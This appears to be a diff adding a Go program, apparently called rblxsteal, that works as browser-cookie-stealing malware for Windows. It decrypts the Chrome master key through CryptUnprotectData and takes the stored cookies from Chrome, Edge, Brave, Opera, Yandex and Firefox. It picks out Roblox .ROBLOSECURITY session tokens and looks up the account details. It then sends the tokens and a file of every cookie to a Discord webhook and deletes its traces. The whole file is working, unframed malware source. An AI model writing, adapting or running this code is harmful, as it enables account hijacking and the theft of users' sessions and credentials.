|
|
@@ -0,0 +1,329 @@ |
|
|
|
package main |
|
|
|
|
|
|
|
import ( |
|
|
|
"crypto/aes" |
|
|
|
"crypto/cipher" |
|
|
|
"database/sql" |
|
|
|
b64 "encoding/base64" |
|
|
|
"encoding/json" |
|
|
|
"fmt" |
|
|
|
"io/ioutil" |
|
|
|
"log" |
|
|
|
"math/rand" |
|
|
|
"os" |
|
|
|
"path/filepath" |
|
|
|
R "rblxsteal/roblox" |
|
|
|
"strings" |
|
|
|
"syscall" |
|
|
|
"unsafe" |
|
|
|
|
|
|
|
"github.com/DisgoOrg/disgohook" |
|
|
|
"github.com/DisgoOrg/disgohook/api" |
|
|
|
_ "github.com/mattn/go-sqlite3" |
|
|
|
) |
|
|
|
|
|
|
|
var webhook string = "webhook here" |
|
|
|
var webhook_id string = strings.Split(webhook, "/")[5] + "/" + strings.Split(webhook, "/")[6] |
|
|
|
|
|
|
|
type BrowserPath struct { |
|
|
|
name string |
|
|
|
processname string |
|
|
|
token string |
|
|
|
password string |
|
|
|
cookies string |
|
|
|
extensions string |
|
|
|
} |
|
|
|
type Output struct { |
|
|
|
host_key interface{} |
|
|
|
name interface{} |
|
|
|
enc interface{} |
|
|
|
} |
|
|
|
|
|
|
|
type PasswordOutput struct { |
|
|
|
url string |
|
|
|
username string |
|
|
|
password []byte |
|
|
|
} |
|
|
|
|
|
|
|
type MozCookies struct { |
|
|
|
host string |
|
|
|
name string |
|
|
|
value []byte |
|
|
|
} |
|
|
|
|
|
|
|
type Cookies struct { |
|
|
|
url string |
|
|
|
name string |
|
|
|
value string |
|
|
|
} |
|
|
|
|
|
|
|
type mystruct struct { |
|
|
|
Hello string `json:"hello,omitempty"` |
|
|
|
} |
|
|
|
|
|
|
|
type DATA_BLOB struct { |
|
|
|
cbData uint32 |
|
|
|
pbData *byte |
|
|
|
} |
|
|
|
|
|
|
|
func NewBlob(d []byte) *DATA_BLOB { |
|
|
|
if len(d) == 0 { |
|
|
|
return &DATA_BLOB{} |
|
|
|
} |
|
|
|
return &DATA_BLOB{ |
|
|
|
pbData: &d[0], |
|
|
|
cbData: uint32(len(d)), |
|
|
|
} |
|
|
|
} |
|
|
|
|
|
|
|
func unencrypt(buff []byte, master_key []byte) string { |
|
|
|
|
|
|
|
starts := string(buff[:3]) |
|
|
|
if starts == "v10" || starts == "v11" { |
|
|
|
iv := buff[3:15] |
|
|
|
payload := buff[15:] |
|
|
|
block, err := aes.NewCipher(master_key) |
|
|
|
if err != nil { |
|
|
|
panic(err.Error()) |
|
|
|
} |
|
|
|
aead, err := cipher.NewGCM(block) |
|
|
|
if err != nil { |
|
|
|
panic(err.Error()) |
|
|
|
} |
|
|
|
decrypted_pass, err := aead.Open(nil, iv, payload, nil) |
|
|
|
if err != nil { |
|
|
|
panic(err.Error()) |
|
|
|
} |
|
|
|
return string(decrypted_pass) |
|
|
|
} |
|
|
|
return "" |
|
|
|
|
|
|
|
} |
|
|
|
|
|
|
|
func (b *DATA_BLOB) ToByteArray() []byte { |
|
|
|
d := make([]byte, b.cbData) |
|
|
|
copy(d, (*[1 << 30]byte)(unsafe.Pointer(b.pbData))[:]) |
|
|
|
return d |
|
|
|
} |
|
|
|
|
|
|
|
func GetEncryptionKey() []byte { |
|
|
|
local_path := filepath.Join(os.Getenv("USERPROFILE"), "AppData", "Local", "Google", "Chrome", "User Data", "Local State") |
|
|
|
local_state_data, err := ioutil.ReadFile(local_path) |
|
|
|
if err != nil { |
|
|
|
|
|
|
|
} |
|
|
|
data := make(map[string]interface{}) |
|
|
|
err = json.Unmarshal([]byte(local_state_data), &data) |
|
|
|
if err != nil { |
|
|
|
|
|
|
|
} |
|
|
|
os_crypt := data["os_crypt"].(map[string]interface{}) |
|
|
|
key := os_crypt["encrypted_key"] |
|
|
|
decoded_key, _ := b64.StdEncoding.DecodeString(key.(string)) |
|
|
|
unprotected_key := decoded_key[5:] |
|
|
|
decreyptedkey, e := Decrypt(unprotected_key) |
|
|
|
if e != nil { |
|
|
|
} |
|
|
|
return decreyptedkey |
|
|
|
} |
|
|
|
func Decrypt(data []byte) ([]byte, error) { |
|
|
|
dllcrypt32 := syscall.NewLazyDLL("Crypt32.dll") |
|
|
|
procDecryptData := dllcrypt32.NewProc("CryptUnprotectData") |
|
|
|
dllkernel32 := syscall.NewLazyDLL("Kernel32.dll") |
|
|
|
procLocalFree := dllkernel32.NewProc("LocalFree") |
|
|
|
var outblob DATA_BLOB |
|
|
|
r, _, err := procDecryptData.Call(uintptr(unsafe.Pointer(NewBlob(data))), 0, 0, 0, 0, 0, uintptr(unsafe.Pointer(&outblob))) |
|
|
|
if r == 0 { |
|
|
|
return nil, err |
|
|
|
} |
|
|
|
defer procLocalFree.Call(uintptr(unsafe.Pointer(outblob.pbData))) |
|
|
|
return outblob.ToByteArray(), nil |
|
|
|
} |
|
|
|
|
|
|
|
const letterBytes = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ" |
|
|
|
|
|
|
|
func checkPathExists(p string) bool { |
|
|
|
_, err := os.Stat(p) |
|
|
|
if err == nil { |
|
|
|
return true |
|
|
|
} |
|
|
|
if os.IsNotExist(err) { |
|
|
|
return false |
|
|
|
} |
|
|
|
return false |
|
|
|
} |
|
|
|
func RandStringBytes(n int) string { |
|
|
|
b := make([]byte, n) |
|
|
|
for i := range b { |
|
|
|
b[i] = letterBytes[rand.Intn(len(letterBytes))] |
|
|
|
} |
|
|
|
return string(b) |
|
|
|
} |
|
|
|
|
|
|
|
func getCookies(path string, cookiePath string, cookies []Cookies) []Cookies { |
|
|
|
if !checkPathExists(path) { |
|
|
|
return cookies |
|
|
|
} |
|
|
|
pathC := path + cookiePath + "/Cookies" |
|
|
|
|
|
|
|
if !checkPathExists(pathC) { |
|
|
|
return cookies |
|
|
|
} |
|
|
|
|
|
|
|
random_path := "kur" + RandStringBytes(8) + ".db" |
|
|
|
f, _ := ioutil.ReadFile(pathC) |
|
|
|
os.Create(random_path) |
|
|
|
os.WriteFile(random_path, f, 0644) |
|
|
|
db, err := sql.Open("sqlite3", random_path) |
|
|
|
if err != nil { |
|
|
|
log.Fatal(err) |
|
|
|
} |
|
|
|
defer db.Close() |
|
|
|
row, err := db.Query("SELECT host_key, name, encrypted_value FROM cookies") |
|
|
|
os.Remove(random_path) |
|
|
|
if err != nil { |
|
|
|
log.Fatal(err) |
|
|
|
} |
|
|
|
pathKey := path + "/Local State" |
|
|
|
local_state_data, err := ioutil.ReadFile(pathKey) |
|
|
|
if err != nil { |
|
|
|
log.Fatal(err) |
|
|
|
} |
|
|
|
data := make(map[string]interface{}) |
|
|
|
err = json.Unmarshal([]byte(local_state_data), &data) |
|
|
|
if err != nil { |
|
|
|
log.Fatal(err) |
|
|
|
} |
|
|
|
os_crypt := data["os_crypt"].(map[string]interface{}) |
|
|
|
key := os_crypt["encrypted_key"] |
|
|
|
decoded_key, _ := b64.StdEncoding.DecodeString(key.(string)) |
|
|
|
unprotected_key := decoded_key[5:] |
|
|
|
decreyptedkey, e := Decrypt(unprotected_key) |
|
|
|
if e != nil { |
|
|
|
os.Exit(0) |
|
|
|
} |
|
|
|
defer row.Close() |
|
|
|
for row.Next() { |
|
|
|
var rowout Output |
|
|
|
row.Scan(&rowout.host_key, &rowout.name, &rowout.enc) |
|
|
|
cookie := unencrypt(rowout.enc.([]byte), decreyptedkey) |
|
|
|
tmpCookie := Cookies{rowout.host_key.(string), rowout.name.(string), cookie} |
|
|
|
cookies = append(cookies, tmpCookie) |
|
|
|
} |
|
|
|
return cookies |
|
|
|
|
|
|
|
} |
|
|
|
|
|
|
|
func firefox(cookies []Cookies) []Cookies { |
|
|
|
path := os.Getenv("APPDATA") + `\Mozilla\Firefox\Profiles` |
|
|
|
if !checkPathExists(path) { |
|
|
|
return cookies |
|
|
|
} |
|
|
|
folders, err := os.ReadDir(path) |
|
|
|
firefox_cookies := []string{} |
|
|
|
if err != nil { |
|
|
|
log.Fatal(err) |
|
|
|
} |
|
|
|
for _, dir := range folders { |
|
|
|
subdir_content, err := os.ReadDir(path + "\\" + dir.Name()) |
|
|
|
if err != nil { |
|
|
|
log.Fatal(err) |
|
|
|
} |
|
|
|
for _, file := range subdir_content { |
|
|
|
if file.Name() == "cookies.sqlite" { |
|
|
|
firefox_cookies = append(firefox_cookies, path+"\\"+dir.Name()+"\\cookies.sqlite") |
|
|
|
} |
|
|
|
} |
|
|
|
} |
|
|
|
for _, i := range firefox_cookies { |
|
|
|
tmpfp := "kur" + RandStringBytes(8) + ".db" |
|
|
|
f, _ := ioutil.ReadFile(i) |
|
|
|
os.Create(tmpfp) |
|
|
|
os.WriteFile(tmpfp, f, 0644) |
|
|
|
db, err := sql.Open("sqlite3", tmpfp) |
|
|
|
defer db.Close() |
|
|
|
defer os.Remove(tmpfp) |
|
|
|
if err != nil { |
|
|
|
os.Remove(tmpfp) |
|
|
|
log.Fatal(err) |
|
|
|
} |
|
|
|
row, err := db.Query("SELECT host, name, value FROM moz_cookies") |
|
|
|
for row.Next() { |
|
|
|
var rowout MozCookies |
|
|
|
row.Scan(&rowout.host, &rowout.name, &rowout.value) |
|
|
|
tmpCookie := Cookies{rowout.host, rowout.name, string(rowout.value)} |
|
|
|
cookies = append(cookies, tmpCookie) |
|
|
|
} |
|
|
|
} |
|
|
|
return cookies |
|
|
|
} |
|
|
|
|
|
|
|
func createCookiesFile(cookies []Cookies) string { |
|
|
|
outStr := "" |
|
|
|
|
|
|
|
for _, i := range cookies { |
|
|
|
outStr += fmt.Sprintf("URL: %s | NAME: %s | VALUE: %s\n", i.url, i.name, i.value) |
|
|
|
} |
|
|
|
return outStr |
|
|
|
} |
|
|
|
|
|
|
|
func createRobloxDiscordWh(data R.UserInfo) { |
|
|
|
webhook, _ := disgohook.NewWebhookClientByToken(nil, nil, webhook_id) |
|
|
|
tosend := fmt.Sprintf("`User ID: `: `%d`\n`User Name`: `%s`\n`Robux`:`%d`\n`BuildersClub`:`%t`\n`Premium`:`%t`\n__Limiteds__ \n```", data.UserID, data.UserName, data.Robux, data.BuildersClub, data.IsPremium) |
|
|
|
for _, asset := range data.Limiteds { |
|
|
|
tosend += fmt.Sprintf("Name: %s | RAP: %g\n", asset.Name, asset.RecentAveragePrice) |
|
|
|
} |
|
|
|
tosend += "```" |
|
|
|
tosend += fmt.Sprintf("\n`Token`: `%s`", data.Token) |
|
|
|
|
|
|
|
webhook.SendContent(tosend) |
|
|
|
|
|
|
|
} |
|
|
|
|
|
|
|
func main() { |
|
|
|
fmt.Println(webhook_id) |
|
|
|
allCookies := []Cookies{} |
|
|
|
roaming := os.Getenv("APPDATA") |
|
|
|
local := os.Getenv("LOCALAPPDATA") |
|
|
|
operaGx := BrowserPath{roaming + "/Opera Software/Opera GX Stable", "opera.exe", "/Local Storage/leveldb", "/", "/Network", "/Local Extension Settings/nkbihfbeogaeaoehlefnkodbefgpgknn"} |
|
|
|
opera := BrowserPath{roaming + "Opera Software/Opera Stable", "opera.exe", "/Local Storage/leveldb", "/", "/Network", "/Local Extension Settings/nkbihfbeogaeaoehlefnkodbefgpgknn"} |
|
|
|
operaNeon := BrowserPath{roaming + "/Opera Software/Opera Neon/User Data/Default", "opera.exe", "/Local Storage/leveldb", "/", "/Network", "/Local Extension Settings/nkbihfbeogaeaoehlefnkodbefgpgknn"} |
|
|
|
chrome := BrowserPath{local + "/Google/Chrome/User Data", "chrome.exe", "/Default/Local Storage/leveldb", "/Default", "/Default/Network", "/Default/Local Extension Settings/nkbihfbeogaeaoehlefnkodbefgpgknn"} |
|
|
|
chromeSxs := BrowserPath{local + "/Google/Chrome SxS/User Data", "chrome.exe", "/Default/Local Storage/leveldb", "/Default", "/Default/Network", "/Default/Local Extension Settings/nkbihfbeogaeaoehlefnkodbefgpgknn"} |
|
|
|
brave := BrowserPath{local + "/BraveSoftware/Brave-Browser/User Data", "brave.exe", "/Default/Local Storage/leveldb", "/Default", "/Default/Network", "/Default/Local Extension Settings/nkbihfbeogaeaoehlefnkodbefgpgknn"} |
|
|
|
yandex := BrowserPath{local + "/Yandex/YandexBrowser/User Data", "yandex.exe", "/Default/Local Storage/leveldb", "/Default", "/Default/Network", "/HougaBouga/nkbihfbeogaeaoehlefnkodbefgpgknn"} |
|
|
|
edge := BrowserPath{local + "/Microsoft/Edge/User Data", "edge.exe", "/Default/Local Storage/leveldb", "/Default", "/Default/Network", "/Default/Local Extension Settings/nkbihfbeogaeaoehlefnkodbefgpgknn"} |
|
|
|
browserPaths := []BrowserPath{operaGx, opera, operaNeon, chrome, chromeSxs, brave, yandex, edge} |
|
|
|
for _, i := range browserPaths { |
|
|
|
allCookies = getCookies(i.name, i.cookies, allCookies) |
|
|
|
} |
|
|
|
allCookies = firefox(allCookies) |
|
|
|
rblxCookies := []string{} |
|
|
|
for _, i := range allCookies { |
|
|
|
if i.name == ".ROBLOSECURITY" { |
|
|
|
rblxCookies = append(rblxCookies, i.value) |
|
|
|
} |
|
|
|
|
|
|
|
} |
|
|
|
|
|
|
|
if len(rblxCookies) != 0 { |
|
|
|
rblxstuff := R.GetRobloxStuff(rblxCookies) |
|
|
|
for _, i := range rblxstuff { |
|
|
|
createRobloxDiscordWh(i) |
|
|
|
} |
|
|
|
} |
|
|
|
towrite := createCookiesFile(allCookies) |
|
|
|
|
|
|
|
os.Create("COOKIES.txt") |
|
|
|
os.WriteFile("COOKIES.txt", []byte(towrite), 0644) |
|
|
|
webhook, _ := disgohook.NewWebhookClientByToken(nil, nil, webhook_id) |
|
|
|
reader, _ := os.Open("COOKIES.txt") |
|
|
|
webhook.SendMessage(api.NewWebhookMessageCreateBuilder().SetContent("All Cookies logged").AddFile("COOKIES.txt", reader).Build()) |
|
|
|
os.Remove("COOKIES.txt") |
|
|
|
here, _ := os.ReadDir("./") |
|
|
|
for _, i := range here { |
|
|
|
if strings.HasSuffix(i.Name(), ".db") { |
|
|
|
os.Remove(i.Name()) |
|
|
|
} |
|
|
|
} |
|
|
|
} |